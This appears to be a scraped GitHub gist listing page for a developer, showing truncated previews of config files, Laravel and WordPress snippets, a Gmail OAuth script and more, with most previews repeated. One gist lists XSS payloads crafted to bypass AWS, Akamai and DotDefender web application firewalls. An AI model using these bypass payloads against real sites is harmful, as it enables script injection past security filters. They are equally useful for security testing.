Frederic Roggon CodeAdminDe

## fail2ban.conf
input {
  file {
    path => "/var/log/fail2ban.log"
    type => "fail2ban"
  }
}

filter {
  if [type] == "fail2ban" {
    grok {

## docker-compose.wordpress.sample.yml
version: '3.7'

networks:
  wp:

volumes:
  app:
  db:

services:

## UserConstantsTest.php
<?php

namespace Tests\Unit\Models;

use App\Models\User;
use PHPUnit\Framework\TestCase;

class UserConstantsTest extends TestCase
{
    /**

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CodeAdminDe
                / keybase.md
            
            
              Created
              October 1, 2021 20:50
            
          
    Keybase proof

I hereby claim:

I am codeadminde on github.
I am codeadminde (https://keybase.io/codeadminde) on keybase.
I have a public key ASAQirRi02kxcEVkUik8ht9dIxb6aiUI8lIZhaIOdXtyPAo

To claim this, I am signing this object:

  
## 202112_HowTo_Laravel8_Landlord_Sessions_with_Tenat_ID.md

      
              4 files
            
          
              0 forks
            
          
              1 comment
            
          
              1 star
            
          
                CodeAdminDe
                / 202112_HowTo_Laravel8_Landlord_Sessions_with_Tenat_ID.md
            
            
              Last active
              January 7, 2022 21:26
            
              
                HowTo - Laravel 8 with landlord session table and tenant_id scopeing
              
          
    202112_HowTo_Laravel8_Landlord_Sessions_with_Tenat_ID

This is a short "how-to implement" of a tenant scopeing for sessions when using

Laravel 8 (laravel.com)
Laravel Jetstream (https://jetstream.laravel.com)
spatie/laravel-multitenancy package (https://spatie.be/docs/laravel-multitenancy)

with a multi-database setup and sessions within the landlord database.

  
## xss-bypass-waf
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>

@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
<img  sr%00c=x o%00nerror=((pro%00mpt(1)))>

DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme

## waybackurls.py
import requests
import sys
import json


def waybackurls(host, with_subs):
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

## functions.part.php
// allow DMG file upload for WC
add_filter('upload_mimes', 'ith__allow_dmg_upload');
function ith__allow_dmg_upload($mime_types){
    $mime_types['dmg'] = 'application/x-apple-diskimage';
    return $mime_types;
}

// allow DMG file download for WC
add_filter( 'woocommerce_file_download_allowed_mime_types', 'ith__add_dmg_mime_type' );
function ith__add_dmg_mime_type( $mime_types ){

## minio-service.swagger.json
swagger: "2.0"
info:
  description: "This is a simple API to restart a minio server."
  version: "1.0.0"
  title: "Swagger Minio 1.0"
  contact:
    email: "frederic.roggon@codeadmin.de"
  license:
    name: "Apache 2.0"
    url: "http://www.apache.org/licenses/LICENSE-2.0.html"

## gmail_oauth.sh
#!/bin/bash

# Injest / setup vars // TODO: error handling needed
client_id=$( cat parsedmarc/credentials.json | jq -r '.installed.client_id' )
client_secret=$( cat parsedmarc/credentials.json | jq -r '.installed.client_secret' )
scope="https://www.googleapis.com/auth/gmail.modify"

echo
echo "This script will take your OAuth Desktop Application credentials.json and use it to get a token to interact with the API"
sleep 2
	input {
	file {
	path => "/var/log/fail2ban.log"
	type => "fail2ban"
	}
	}

	filter {
	if [type] == "fail2ban" {
	grok {
	<?php

	namespace Tests\Unit\Models;

	use App\Models\User;
	use PHPUnit\Framework\TestCase;

	class UserConstantsTest extends TestCase
	{
	/**
	@vanshitmalhotra \| Bypass AWS WAF -//
	Add "<!" (without quotes) before your payload and bypass that WAF. :)
	eg: <!<script>confirm(1)</script>

	@black0x00mamba \| Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
	<img sr%00c=x o%00nerror=((pro%00mpt(1)))>

	DotDefender WAF bypass by @0xInfection
	<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;()%20draggable=True>dragme
	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
	// allow DMG file upload for WC
	add_filter('upload_mimes', 'ith__allow_dmg_upload');
	function ith__allow_dmg_upload($mime_types){
	$mime_types['dmg'] = 'application/x-apple-diskimage';
	return $mime_types;
	}

	// allow DMG file download for WC
	add_filter( 'woocommerce_file_download_allowed_mime_types', 'ith__add_dmg_mime_type' );
	function ith__add_dmg_mime_type( $mime_types ){
	swagger: "2.0"
	info:
	description: "This is a simple API to restart a minio server."
	version: "1.0.0"
	title: "Swagger Minio 1.0"
	contact:
	email: "frederic.roggon@codeadmin.de"
	license:
	name: "Apache 2.0"
	url: "http://www.apache.org/licenses/LICENSE-2.0.html"
	#!/bin/bash

	# Injest / setup vars // TODO: error handling needed
	client_id=$( cat parsedmarc/credentials.json \| jq -r '.installed.client_id' )
	client_secret=$( cat parsedmarc/credentials.json \| jq -r '.installed.client_secret' )
	scope="https://www.googleapis.com/auth/gmail.modify"

	echo
	echo "This script will take your OAuth Desktop Application credentials.json and use it to get a token to interact with the API"
	sleep 2